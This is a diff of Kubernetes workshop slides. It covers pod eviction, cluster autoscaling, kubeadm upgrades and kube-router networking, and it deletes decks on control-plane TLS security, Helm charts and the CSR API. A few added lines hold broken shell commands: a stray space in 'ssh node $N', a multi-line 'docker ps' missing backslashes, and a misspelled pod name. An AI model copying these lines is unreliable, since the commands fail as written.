- memory
|
||||
|
||||
- node disk usage (typically the root filesystem of the node)
|
||||
|
||||
- image disk usage (where container images and RW layers are stored)
|
||||
|
||||
- For each resource, we can provide two thresholds:
|
||||
|
||||
- a hard threshold (if it's met, it provokes immediate action)
|
||||
|
||||
- a soft threshold (provokes action only after a grace period)
|
||||
|
||||
- Resource thresholds and grace periods are configurable
|
||||
|
||||
(by passing kubelet command-line flags)
|
||||
|
||||
---
|
||||
|
||||
## What happens then?
|
||||
|
||||
- If disk usage is too high:
|
||||
|
||||
- kubelet will try to remove terminated pods
|
||||
|
||||
- then, it will try to *evict* pods
|
||||
|
||||
- If memory usage is too high:
|
||||
|
||||
- it will try to evict pods
|
||||
|
||||
- The node is marked as "under pressure"
|
||||
|
||||
- This temporarily prevents new pods from being scheduled on the node
|
||||
|
||||
---
|
||||
|
||||
## Which pods get evicted?
|
||||
|
||||
- kubelet looks at the pods' QoS and PriorityClass
|
||||
|
||||
- First, pods with BestEffort QoS are considered
|
||||
|
||||
- Then, pods with Burstable QoS exceeding their *requests*
|
||||
|
||||
(but only if the exceeding resource is the one that is low on the node)
|
||||
|
||||
- Finally, pods with Guaranteed QoS, and Burstable pods within their requests
|
||||
|
||||
- Within each group, pods are sorted by PriorityClass
|
||||
|
||||
- If there are pods with the same PriorityClass, they are sorted by usage excess
|
||||
|
||||
(i.e. the pods whose usage exceeds their requests the most are evicted first)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Eviction of Guaranteed pods
|
||||
|
||||
- *Normally*, pods with Guaranteed QoS should not be evicted
|
||||
|
||||
- A chunk of resources is reserved for node processes (like kubelet)
|
||||
|
||||
- It is expected that these processes won't use more than this reservation
|
||||
|
||||
- If they do use more resources anyway, all bets are off!
|
||||
|
||||
- If this happens, kubelet must evict Guaranteed pods to preserve node stability
|
||||
|
||||
(or Burstable pods that are still within their requested usage)
|
||||
|
||||
---
|
||||
|
||||
## What happens to evicted pods?
|
||||
|
||||
- The pod is terminated
|
||||
|
||||
- It is marked as `Failed` at the API level
|
||||
|
||||
- If the pod was created by a controller, the controller will recreate it
|
||||
|
||||
- The pod will be recreated on another node, *if there are resources available!*
|
||||
|
||||
- For more details about the eviction process, see:
|
||||
|
||||
- [this documentation page](https://kubernetes.io/docs/tasks/administer-cluster/out-of-resource/) about resource pressure and pod eviction,
|
||||
|
||||
- [this other documentation page](https://kubernetes.io/docs/concepts/configuration/pod-priority-preemption/) about pod priority and preemption.
|
||||
|
||||
---
|
||||
|
||||
## What if there are no resources available?
|
||||
|
||||
- Sometimes, a pod cannot be scheduled anywhere:
|
||||
|
||||
- all the nodes are under pressure,
|
||||
|
||||
- or the pod requests more resources than are available
|
||||
|
||||
- The pod then remains in `Pending` state until the situation improves
|
||||
|
||||
---
|
||||
|
||||
## Cluster scaling
|
||||
|
||||
- One way to improve the situation is to add new nodes
|
||||
|
||||
- This can be done automatically with the [Cluster Autoscaler](https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler)
|
||||
|
||||
- The autoscaler will automatically scale up:
|
||||
|
||||
- if there are pods that failed to be scheduled
|
||||
|
||||
- The autoscaler will automatically scale down:
|
||||
|
||||
- if nodes have a low utilization for an extended period of time
|
||||
|
||||
---
|
||||
|
||||
## Restrictions, gotchas ...
|
||||
|
||||
- The Cluster Autoscaler only supports a few cloud infrastructures
|
||||
|
||||
(see [here](https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler/cloudprovider) for a list) - ([in preview for AKS](https://docs.microsoft.com/en-us/azure/aks/cluster-autoscaler))
|
||||
|
||||
- The Cluster Autoscaler cannot scale down nodes that have pods using:
|
||||
|
||||
- local storage
|
||||
|
||||
- affinity/anti-affinity rules preventing them from being rescheduled
|
||||
|
||||
- a restrictive PodDisruptionBudget
|
||||
|
||||
---
|
||||
|
||||
## Other way to do capacity planning
|
||||
|
||||
- "Running Kubernetes without nodes"
|
||||
|
||||
- Systems like [Virtual Kubelet](https://virtual-kubelet.io/) or Kiyot can run pods using on-demand resources
|
||||
|
||||
- Virtual Kubelet can leverage e.g. ACI or Fargate to run pods
|
||||
|
||||
- Kiyot runs pods in ad-hoc EC2 instances (1 instance per pod)
|
||||
|
||||
- Economic advantage (no wasted capacity)
|
||||
|
||||
- Security advantage (stronger isolation between pods)
|
||||
|
||||
Check [this blog post](http://jpetazzo.github.io/2019/02/13/running-kubernetes-without-nodes-with-kiyot/) for more details.
|
||||
@@ -166,7 +166,7 @@
|
||||
|
||||
- Upgrade kubelet:
|
||||
```bash
|
||||
apt install kubelet=1.14.2-00
|
||||
apt install kubelet=1.14.1-00
|
||||
```
|
||||
|
||||
]
|
||||
@@ -267,7 +267,7 @@
|
||||
|
||||
- Perform the upgrade:
|
||||
```bash
|
||||
sudo kubeadm upgrade apply v1.14.2
|
||||
sudo kubeadm upgrade apply v1.14.1
|
||||
```
|
||||
|
||||
]
|
||||
@@ -287,8 +287,8 @@
|
||||
- Download the configuration on each node, and upgrade kubelet:
|
||||
```bash
|
||||
for N in 1 2 3; do
|
||||
ssh test$N sudo kubeadm upgrade node config --kubelet-version v1.14.2
|
||||
ssh test$N sudo apt install kubelet=1.14.2-00
|
||||
ssh node$N sudo kubeadm upgrade node config --kubelet-version v1.14.1
|
||||
ssh node $N sudo apt install kubelet=1.14.1-00
|
||||
done
|
||||
```
|
||||
]
|
||||
@@ -297,7 +297,7 @@
|
||||
|
||||
## Checking what we've done
|
||||
|
||||
- All our nodes should now be updated to version 1.14.2
|
||||
- All our nodes should now be updated to version 1.14.1
|
||||
|
||||
.exercise[
|
||||
|
||||
|
||||
@@ -26,7 +26,7 @@
|
||||
|
||||
The reference plugins are available [here].
|
||||
|
||||
Look in each plugin's directory for its documentation.
|
||||
Look into each plugin's directory for its documentation.
|
||||
|
||||
[here]: https://github.com/containernetworking/plugins/tree/master/plugins
|
||||
|
||||
@@ -66,8 +66,6 @@ Look in each plugin's directory for its documentation.
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Conf vs conflist
|
||||
|
||||
- There are two slightly different configuration formats
|
||||
@@ -100,7 +98,7 @@ class: extra-details
|
||||
|
||||
- CNI_NETNS: path to network namespace file
|
||||
|
||||
- CNI_IFNAME: what the network interface should be named
|
||||
- CNI_IFNAME: how the network interface should be named
|
||||
|
||||
- The network configuration must be provided to the plugin on stdin
|
||||
|
||||
@@ -190,16 +188,12 @@ class: extra-details
|
||||
|
||||
- ... But this time, the controller manager will allocate `podCIDR` subnets
|
||||
|
||||
(so that we don't have to manually assign subnets to individual nodes)
|
||||
- We will start kube-router with a DaemonSet
|
||||
|
||||
- We will create a DaemonSet for kube-router
|
||||
|
||||
- We will join nodes to the cluster
|
||||
|
||||
- The DaemonSet will automatically start a kube-router pod on each node
|
||||
- This DaemonSet will start one instance of kube-router on each node
|
||||
|
||||
---
|
||||
|
||||
|
||||
## Logging into the new cluster
|
||||
|
||||
.exercise[
|
||||
@@ -227,7 +221,7 @@ class: extra-details
|
||||
- It is similar to the one we used with the `kubenet` cluster
|
||||
|
||||
- The API server is started with `--allow-privileged`
|
||||
|
||||
|
||||
(because we will start kube-router in privileged pods)
|
||||
|
||||
- The controller manager is started with extra flags too:
|
||||
@@ -260,7 +254,7 @@ class: extra-details
|
||||
|
||||
---
|
||||
|
||||
## The kube-router DaemonSet
|
||||
## The kube-router DaemonSet
|
||||
|
||||
- In the same directory, there is a `kuberouter.yaml` file
|
||||
|
||||
@@ -278,7 +272,7 @@ class: extra-details
|
||||
|
||||
- The address of the API server will be `http://A.B.C.D:8080`
|
||||
|
||||
(where `A.B.C.D` is the public address of `kuberouter1`, running the control plane)
|
||||
(where `A.B.C.D` is the address of `kuberouter1`, running the control plane)
|
||||
|
||||
.exercise[
|
||||
|
||||
@@ -306,10 +300,12 @@ Note: the DaemonSet won't create any pods (yet) since there are no nodes (yet).
|
||||
|
||||
- Generate the kubeconfig file (replacing `X.X.X.X` with the address of `kuberouter1`):
|
||||
```bash
|
||||
kubectl config set-cluster cni --server http://`X.X.X.X`:8080
|
||||
kubectl config set-context cni --cluster cni
|
||||
kubectl config use-context cni
|
||||
cp ~/.kube/config ~/kubeconfig
|
||||
kubectl --kubeconfig ~/kubeconfig config \
|
||||
set-cluster kubenet --server http://`X.X.X.X`:8080
|
||||
kubectl --kubeconfig ~/kubeconfig config \
|
||||
set-context kubenet --cluster kubenet
|
||||
kubectl --kubeconfig ~/kubeconfig config\
|
||||
use-context kubenet
|
||||
```
|
||||
|
||||
]
|
||||
@@ -455,7 +451,7 @@ We should see the local pod CIDR connected to `kube-bridge`, and the other nodes
|
||||
|
||||
- Or try to exec into one of the kube-router pods:
|
||||
```bash
|
||||
kubectl -n kube-system exec kube-router-xxxxx bash
|
||||
kubectl -n kube-system exec kuber-router-xxxxx bash
|
||||
```
|
||||
|
||||
]
|
||||
@@ -491,8 +487,8 @@ What does that mean?
|
||||
|
||||
- First, get the container ID, with `docker ps` or like this:
|
||||
```bash
|
||||
CID=$(docker ps -q \
|
||||
--filter label=io.kubernetes.pod.namespace=kube-system \
|
||||
CID=$(docker ps
|
||||
--filter label=io.kubernetes.pod.namespace=kube-system
|
||||
--filter label=io.kubernetes.container.name=kube-router)
|
||||
```
|
||||
|
||||
@@ -577,7 +573,7 @@ done
|
||||
|
||||
## Starting the route reflector
|
||||
|
||||
- Only do this slide if you are doing this on your own
|
||||
- Only do this if you are doing this on your own
|
||||
|
||||
- There is a Compose file in the `compose/frr-route-reflector` directory
|
||||
|
||||
@@ -603,13 +599,13 @@ done
|
||||
|
||||
## Updating kube-router configuration
|
||||
|
||||
- We need to pass two command-line flags to the kube-router process
|
||||
- We need to add two command-line flags to the kube-router process
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit the `kuberouter.yaml` file
|
||||
|
||||
- Add the following flags to the kube-router arguments:
|
||||
- Add the following flags to the kube-router arguments,:
|
||||
```
|
||||
- "--peer-router-ips=`X.X.X.X`"
|
||||
- "--peer-router-asns=64512"
|
||||
|
||||
@@ -177,7 +177,7 @@ class: extra-details
|
||||
|
||||
- In that case, there is no "master node"
|
||||
|
||||
*For this reason, it is more accurate to say "control plane" rather than "master."*
|
||||
*For this reason, it is more accurate to say "control plane" rather than "master".*
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -22,7 +22,7 @@
|
||||
|
||||
- There are many ways to pass configuration to code running in a container:
|
||||
|
||||
- baking it into a custom image
|
||||
- baking it in a custom image
|
||||
|
||||
- command-line arguments
|
||||
|
||||
@@ -125,7 +125,7 @@
|
||||
|
||||
- We can also use a mechanism called the *downward API*
|
||||
|
||||
- The downward API allows exposing pod or container information
|
||||
- The downward API allows to expose pod or container information
|
||||
|
||||
- either through special files (we won't show that for now)
|
||||
|
||||
@@ -436,7 +436,7 @@ We should see connections served by Google, and others served by IBM.
|
||||
|
||||
- We are going to store the port number in a configmap
|
||||
|
||||
- Then we will expose that configmap as a container environment variable
|
||||
- Then we will expose that configmap to a container environment variable
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -1,265 +0,0 @@
|
||||
# Securing the control plane
|
||||
|
||||
- Many components accept connections (and requests) from others:
|
||||
|
||||
- API server
|
||||
|
||||
- etcd
|
||||
|
||||
- kubelet
|
||||
|
||||
- We must secure these connections:
|
||||
|
||||
- to deny unauthorized requests
|
||||
|
||||
- to prevent eavesdropping secrets, tokens, and other sensitive information
|
||||
|
||||
- Disabling authentication and/or authorization is **strongly discouraged**
|
||||
|
||||
(but it's possible to do it, e.g. for learning / troubleshooting purposes)
|
||||
|
||||
---
|
||||
|
||||
## Authentication and authorization
|
||||
|
||||
- Authentication (checking "who you are") is done with mutual TLS
|
||||
|
||||
(both the client and the server need to hold a valid certificate)
|
||||
|
||||
- Authorization (checking "what you can do") is done in different ways
|
||||
|
||||
- the API server implements a sophisticated permission logic (with RBAC)
|
||||
|
||||
- some services will defer authorization to the API server (through webhooks)
|
||||
|
||||
- some services require a certificate signed by a particular CA / sub-CA
|
||||
|
||||
---
|
||||
|
||||
## In practice
|
||||
|
||||
- We will review the various communication channels in the control plane
|
||||
|
||||
- We will describe how they are secured
|
||||
|
||||
- When TLS certificates are used, we will indicate:
|
||||
|
||||
- which CA signs them
|
||||
|
||||
- what their subject (CN) should be, when applicable
|
||||
|
||||
- We will indicate how to configure security (client- and server-side)
|
||||
|
||||
---
|
||||
|
||||
## etcd peers
|
||||
|
||||
- Replication and coordination of etcd happens on a dedicated port
|
||||
|
||||
(typically port 2380; the default port for normal client connections is 2379)
|
||||
|
||||
- Authentication uses TLS certificates with a separate sub-CA
|
||||
|
||||
(otherwise, anyone with a Kubernetes client certificate could access etcd!)
|
||||
|
||||
- The etcd command line flags involved are:
|
||||
|
||||
`--peer-client-cert-auth=true` to activate it
|
||||
|
||||
`--peer-cert-file`, `--peer-key-file`, `--peer-trusted-ca-file`
|
||||
|
||||
---
|
||||
|
||||
## etcd clients
|
||||
|
||||
- The only¹ thing that connects to etcd is the API server
|
||||
|
||||
- Authentication uses TLS certificates with a separate sub-CA
|
||||
|
||||
(for the same reasons as for etcd inter-peer authentication)
|
||||
|
||||
- The etcd command line flags involved are:
|
||||
|
||||
`--client-cert-auth=true` to activate it
|
||||
|
||||
`--trusted-ca-file`, `--cert-file`, `--key-file`
|
||||
|
||||
- The API server command line flags involved are:
|
||||
|
||||
`--etcd-cafile`, `--etcd-certfile`, `--etcd-keyfile`
|
||||
|
||||
.footnote[¹Technically, there is also the etcd healthcheck. Let's ignore it for now.]
|
||||
|
||||
---
|
||||
|
||||
## API server clients
|
||||
|
||||
- The API server has a sophisticated authentication and authorization system
|
||||
|
||||
- For connections coming from other components of the control plane:
|
||||
|
||||
- authentication uses certificates (trusting the certificates' subject or CN)
|
||||
|
||||
- authorization uses whatever mechanism is enabled (most oftentimes, RBAC)
|
||||
|
||||
- The relevant API server flags are:
|
||||
|
||||
`--client-ca-file`, `--tls-cert-file`, `--tls-private-key-file`
|
||||
|
||||
- Each component connecting to the API server takes a `--kubeconfig` flag
|
||||
|
||||
(to specify a kubeconfig file containing the CA cert, client key, and client cert)
|
||||
|
||||
- Yes, that kubeconfig file follows the same format as our `~/.kube/config` file!
|
||||
|
||||
---
|
||||
|
||||
## Kubelet and API server
|
||||
|
||||
- Communication between kubelet and API server can be established both ways
|
||||
|
||||
- Kubelet → API server:
|
||||
|
||||
- kubelet registers itself ("hi, I'm node42, do you have work for me?")
|
||||
|
||||
- connection is kept open and re-established if it breaks
|
||||
|
||||
- that's how the kubelet knows which pods to start/stop
|
||||
|
||||
- API server → kubelet:
|
||||
|
||||
- used to retrieve logs, exec, attach to containers
|
||||
|
||||
---
|
||||
|
||||
## Kubelet → API server
|
||||
|
||||
- Kubelet is started with `--kubeconfig` with API server information
|
||||
|
||||
- The client certificate of the kubelet will typically have:
|
||||
|
||||
`CN=system:node:<nodename>` and groups `O=system:nodes`
|
||||
|
||||
- Nothing special on the API server side
|
||||
|
||||
(it will authenticate like any other client)
|
||||
|
||||
---
|
||||
|
||||
## API server → kubelet
|
||||
|
||||
- Kubelet is started with the flag `--client-ca-file`
|
||||
|
||||
(typically using the same CA as the API server)
|
||||
|
||||
- API server will use a dedicated key pair when contacting kubelet
|
||||
|
||||
(specified with `--kubelet-client-certificate` and `--kubelet-client-key`)
|
||||
|
||||
- Authorization uses webhooks
|
||||
|
||||
(enabled with `--authorization-mode=Webhook` on kubelet)
|
||||
|
||||
- The webhook server is the API server itself
|
||||
|
||||
(the kubelet sends back a request to the API server to ask, "can this person do that?")
|
||||
|
||||
---
|
||||
|
||||
## Scheduler
|
||||
|
||||
- The scheduler connects to the API server like an ordinary client
|
||||
|
||||
- The certificate of the scheduler will have `CN=system:kube-scheduler`
|
||||
|
||||
---
|
||||
|
||||
## Controller manager
|
||||
|
||||
- The controller manager is also a normal client to the API server
|
||||
|
||||
- Its certificate will have `CN=system:kube-controller-manager`
|
||||
|
||||
- If we use the CSR API, the controller manager needs the CA cert and key
|
||||
|
||||
(passed with flags `--cluster-signing-cert-file` and `--cluster-signing-key-file`)
|
||||
|
||||
- We usually want the controller manager to generate tokens for service accounts
|
||||
|
||||
- These tokens deserve some details (on the next slide!)
|
||||
|
||||
---
|
||||
|
||||
## Service account tokens
|
||||
|
||||
- Each time we create a service account, the controller manager generates a token
|
||||
|
||||
- These tokens are JWT tokens, signed with a particular key
|
||||
|
||||
- These tokens are used for authentication with the API server
|
||||
|
||||
(and therefore, the API server needs to be able to verify their integrity)
|
||||
|
||||
- This uses another keypair:
|
||||
|
||||
- the private key (used for signature) is passed to the controller manager
|
||||
<br/>(using flags `--service-account-private-key-file` and `--root-ca-file`)
|
||||
|
||||
- the public key (used for verification) is passed to the API server
|
||||
<br/>(using flag `--service-account-key-file`)
|
||||
|
||||
---
|
||||
|
||||
## kube-proxy
|
||||
|
||||
- kube-proxy is "yet another API server client"
|
||||
|
||||
- In many clusters, it runs as a Daemon Set
|
||||
|
||||
- In that case, it will have its own Service Account and associated permissions
|
||||
|
||||
- It will authenticate using the token of that Service Account
|
||||
|
||||
---
|
||||
|
||||
## Webhooks
|
||||
|
||||
- We mentioned webhooks earlier; how does that really work?
|
||||
|
||||
- The Kubernetes API has special resource types to check permissions
|
||||
|
||||
- One of them is SubjectAccessReview
|
||||
|
||||
- To check if a particular user can do a particular action on a particular resource:
|
||||
|
||||
- we prepare a SubjectAccessReview object
|
||||
|
||||
- we send that object to the API server
|
||||
|
||||
- the API server responds with allow/deny (and optional explanations)
|
||||
|
||||
- Using webhooks for authorization = sending SAR to authorize each request
|
||||
|
||||
---
|
||||
|
||||
## Subject Access Review
|
||||
|
||||
Here is an example showing how to check if `jean.doe` can `get` some `pods` in `kube-system`:
|
||||
|
||||
```bash
|
||||
kubectl -v9 create -f- <<EOF
|
||||
apiVersion: authorization.k8s.io/v1beta1
|
||||
kind: SubjectAccessReview
|
||||
spec:
|
||||
user: jean.doe
|
||||
group:
|
||||
- foo
|
||||
- bar
|
||||
resourceAttributes:
|
||||
#group: blah.k8s.io
|
||||
namespace: kube-system
|
||||
resource: pods
|
||||
verb: get
|
||||
#name: web-xyz1234567-pqr89
|
||||
EOF
|
||||
```
|
||||
@@ -1,114 +0,0 @@
|
||||
## Creating a chart
|
||||
|
||||
- We are going to show a way to create a *very simplified* chart
|
||||
|
||||
- In a real chart, *lots of things* would be templatized
|
||||
|
||||
(Resource names, service types, number of replicas...)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a sample chart:
|
||||
```bash
|
||||
helm create dockercoins
|
||||
```
|
||||
|
||||
- Move away the sample templates and create an empty template directory:
|
||||
```bash
|
||||
mv dockercoins/templates dockercoins/default-templates
|
||||
mkdir dockercoins/templates
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Exporting the YAML for our application
|
||||
|
||||
- The following section assumes that DockerCoins is currently running
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create one YAML file for each resource that we need:
|
||||
.small[
|
||||
```bash
|
||||
|
||||
while read kind name; do
|
||||
kubectl get -o yaml $kind $name > dockercoins/templates/$name-$kind.yaml
|
||||
done <<EOF
|
||||
deployment worker
|
||||
deployment hasher
|
||||
daemonset rng
|
||||
deployment webui
|
||||
deployment redis
|
||||
service hasher
|
||||
service rng
|
||||
service webui
|
||||
service redis
|
||||
EOF
|
||||
```
|
||||
]
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Testing our helm chart
|
||||
|
||||
.exercise[
|
||||
|
||||
- Let's install our helm chart! (`dockercoins` is the path to the chart)
|
||||
```
|
||||
helm install dockercoins
|
||||
```
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
- Since the application is already deployed, this will fail:<br>
|
||||
`Error: release loitering-otter failed: services "hasher" already exists`
|
||||
|
||||
- To avoid naming conflicts, we will deploy the application in another *namespace*
|
||||
|
||||
---
|
||||
|
||||
## Switching to another namespace
|
||||
|
||||
- We can create a new namespace and switch to it
|
||||
|
||||
(Helm will automatically use the namespace specified in our context)
|
||||
|
||||
- We can also tell Helm which namespace to use
|
||||
|
||||
.exercise[
|
||||
|
||||
- Tell Helm to use a specific namespace:
|
||||
```bash
|
||||
helm install dockercoins --namespace=magenta
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Checking our new copy of DockerCoins
|
||||
|
||||
- We can check the worker logs, or the web UI
|
||||
|
||||
.exercise[
|
||||
|
||||
- Retrieve the NodePort number of the web UI:
|
||||
```bash
|
||||
kubectl get service webui --namespace=magenta
|
||||
```
|
||||
|
||||
- Open it in a web browser
|
||||
|
||||
- Look at the worker logs:
|
||||
```bash
|
||||
kubectl logs deploy/worker --tail=10 --follow --namespace=magenta
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
Note: it might take a minute or two for the worker to start.
|
||||
@@ -1,367 +0,0 @@
|
||||
# Creating Helm charts
|
||||
|
||||
- We are going to create a generic Helm chart
|
||||
|
||||
- We will use that Helm chart to deploy DockerCoins
|
||||
|
||||
- Each component of DockerCoins will have its own *release*
|
||||
|
||||
- In other words, we will "install" that Helm chart multiple times
|
||||
|
||||
(one time per component of DockerCoins)
|
||||
|
||||
---
|
||||
|
||||
## Creating a generic chart
|
||||
|
||||
- Rather than starting from scratch, we will use `helm create`
|
||||
|
||||
- This will give us a basic chart that we will customize
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a basic chart:
|
||||
```bash
|
||||
cd ~
|
||||
helm create helmcoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
This creates a basic chart in the directory `helmcoins`.
|
||||
|
||||
---
|
||||
|
||||
## What's in the basic chart?
|
||||
|
||||
- The basic chart will create a Deployment and a Service
|
||||
|
||||
- Optionally, it will also include an Ingress
|
||||
|
||||
- If we don't pass any values, it will deploy the `nginx` image
|
||||
|
||||
- We can override many things in that chart
|
||||
|
||||
- Let's try to deploy DockerCoins components with that chart!
|
||||
|
||||
---
|
||||
|
||||
## Writing `values.yaml` for our components
|
||||
|
||||
- We need to write one `values.yaml` file for each component
|
||||
|
||||
(hasher, redis, rng, webui, worker)
|
||||
|
||||
- We will start with the `values.yaml` of the chart, and remove what we don't need
|
||||
|
||||
- We will create 5 files:
|
||||
|
||||
hasher.yaml, redis.yaml, rng.yaml, webui.yaml, worker.yaml
|
||||
|
||||
---
|
||||
|
||||
## Getting started
|
||||
|
||||
- For component X, we want to use the image dockercoins/X:v0.1
|
||||
|
||||
(for instance, for rng, we want to use the image dockercoins/rng:v0.1)
|
||||
|
||||
- Exception: for redis, we want to use the official image redis:latest
|
||||
|
||||
.exercise[
|
||||
|
||||
- Write minimal YAML files for the 5 components, specifying only the image
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
*Hint: our YAML files should look like this.*
|
||||
|
||||
```yaml
|
||||
### rng.yaml
|
||||
image:
|
||||
repository: dockercoins/`rng`
|
||||
tag: v0.1
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Deploying DockerCoins components
|
||||
|
||||
- For convenience, let's work in a separate namespace
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a new namespace:
|
||||
```bash
|
||||
kubectl create namespace helmcoins
|
||||
```
|
||||
|
||||
- Switch to that namespace:
|
||||
```bash
|
||||
kns helmcoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Deploying the chart
|
||||
|
||||
- To install a chart, we can use the following command:
|
||||
```bash
|
||||
helm install [--name `X`] <chart>
|
||||
```
|
||||
|
||||
- We can also use the following command, which is idempotent:
|
||||
```bash
|
||||
helm upgrade --install `X` chart
|
||||
```
|
||||
|
||||
.exercise[
|
||||
|
||||
- Install the 5 components of DockerCoins:
|
||||
```bash
|
||||
for COMPONENT in hasher redis rng webui worker; do
|
||||
helm upgrade --install $COMPONENT helmcoins/ --values=$COMPONENT.yaml
|
||||
done
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Checking what we've done
|
||||
|
||||
- Let's see if DockerCoins is working!
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check the logs of the worker:
|
||||
```bash
|
||||
stern worker
|
||||
```
|
||||
|
||||
- Look at the resources that were created:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
There are *many* issues to fix!
|
||||
|
||||
---
|
||||
|
||||
## Service names
|
||||
|
||||
- Our services should be named `rng`, `hasher`, etc., but they are named differently
|
||||
|
||||
- Look at the YAML template used for the services
|
||||
|
||||
- Does it look like we can override the name of the services?
|
||||
|
||||
--
|
||||
|
||||
- *Yes*, we can use `.Values.nameOverride`
|
||||
|
||||
- This means setting `nameOverride` in the values YAML file
|
||||
|
||||
---
|
||||
|
||||
## Setting service names
|
||||
|
||||
- Let's add `nameOverride: X` in each values YAML file!
|
||||
|
||||
(where X is hasher, redis, rng, etc.)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit the 5 YAML files to add `nameOverride: X`
|
||||
|
||||
- Deploy the updated Chart:
|
||||
```bash
|
||||
for COMPONENT in hasher redis rng webui worker; do
|
||||
helm upgrade --install $COMPONENT helmcoins/ --values=$COMPONENT.yaml
|
||||
done
|
||||
```
|
||||
(Yes, this is exactly the same command as before!)
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Checking what we've done
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check the service names:
|
||||
```bash
|
||||
kubectl get services
|
||||
```
|
||||
Great! (We have a useless service for `worker`, but let's ignore it for now.)
|
||||
|
||||
- Check the state of the pods:
|
||||
```bash
|
||||
kubectl get pods
|
||||
```
|
||||
Not so great... Some pods are *not ready.*
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Troubleshooting pods
|
||||
|
||||
- The easiest way to troubleshoot pods is to look at *events*
|
||||
|
||||
- We can look at all the events on the cluster (with `kubectl get events`)
|
||||
|
||||
- Or we can use `kubectl describe` on the objects that have problems
|
||||
|
||||
(`kubectl describe` will retrieve the events related to the object)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check the events for the redis pods:
|
||||
```bash
|
||||
kubectl describe pod -l app.kubernetes.io/name=redis
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
What's going on?
|
||||
|
||||
---
|
||||
|
||||
## Healthchecks
|
||||
|
||||
- The default chart defines healthchecks doing HTTP requests on port 80
|
||||
|
||||
- That won't work for redis and worker
|
||||
|
||||
(redis is not HTTP, and not on port 80; worker doesn't even listen)
|
||||
|
||||
--
|
||||
|
||||
- We could comment out the healthchecks
|
||||
|
||||
- We could also make them conditional
|
||||
|
||||
- This sounds more interesting, let's do that!
|
||||
|
||||
---
|
||||
|
||||
## Conditionals
|
||||
|
||||
- We need to enclose the healthcheck block with:
|
||||
|
||||
`{{ if CONDITION }}` at the beginning
|
||||
|
||||
`{{ end }}` at the end
|
||||
|
||||
- For the condition, we will use `.Values.healthcheck`
|
||||
|
||||
---
|
||||
|
||||
## Updating the deployment template
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit `helmcoins/templates/deployment.yaml`
|
||||
|
||||
- Before the healthchecks section (it starts with `livenessProbe:`), add:
|
||||
|
||||
`{{ if .Values.healthcheck }}`
|
||||
|
||||
- After the healthchecks section (just before `resources:`), add:
|
||||
|
||||
`{{ end }}`
|
||||
|
||||
- Edit `hasher.yaml`, `rng.yaml`, `webui.yaml` to add:
|
||||
|
||||
`healthcheck: true`
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Update the deployed charts
|
||||
|
||||
- We can now apply the new templates (and the new values)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Use the same command as earlier to upgrade all five components
|
||||
|
||||
- Use `kubectl describe` to confirm that `redis` starts correctly
|
||||
|
||||
- Use `kubectl describe` to confirm that `hasher` still has healthchecks
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Is it working now?
|
||||
|
||||
- If we look at the worker logs, it appears that the worker is still stuck
|
||||
|
||||
- What could be happening?
|
||||
|
||||
--
|
||||
|
||||
- The redis service is not on port 80!
|
||||
|
||||
- We need to update the port number in redis.yaml
|
||||
|
||||
- We also need to update the port number in deployment.yaml
|
||||
|
||||
(it is hard-coded to 80 there)
|
||||
|
||||
---
|
||||
|
||||
## Setting the redis port
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit `redis.yaml` to add:
|
||||
```yaml
|
||||
service:
|
||||
port: 6379
|
||||
```
|
||||
|
||||
- Edit `helmcoins/templates/deployment.yaml`
|
||||
|
||||
- The line with `containerPort` should be:
|
||||
```yaml
|
||||
containerPort: {{ .Values.service.port }}
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Apply changes
|
||||
|
||||
- Re-run the for loop to execute `helm upgrade` one more time
|
||||
|
||||
- Check the worker logs
|
||||
|
||||
- This time, it should be working!
|
||||
|
||||
---
|
||||
|
||||
## Extra steps
|
||||
|
||||
- We don't need to create a service for the worker
|
||||
|
||||
- We can put the whole service block in a conditional
|
||||
|
||||
(this will require additional changes in other files referencing the service)
|
||||
|
||||
- We can set the webui to be a NodePort service
|
||||
|
||||
- We can change the number of workers with `replicaCount`
|
||||
|
||||
- And much more!
|
||||
@@ -1,426 +0,0 @@
|
||||
# The CSR API
|
||||
|
||||
- The Kubernetes API exposes CSR resources
|
||||
|
||||
- We can use these resources to issue TLS certificates
|
||||
|
||||
- First, we will go through a quick reminder about TLS certificates
|
||||
|
||||
- Then, we will see how to obtain a certificate for a user
|
||||
|
||||
- We will use that certificate to authenticate with the cluster
|
||||
|
||||
- Finally, we will grant some privileges to that user
|
||||
|
||||
---
|
||||
|
||||
## Reminder about TLS
|
||||
|
||||
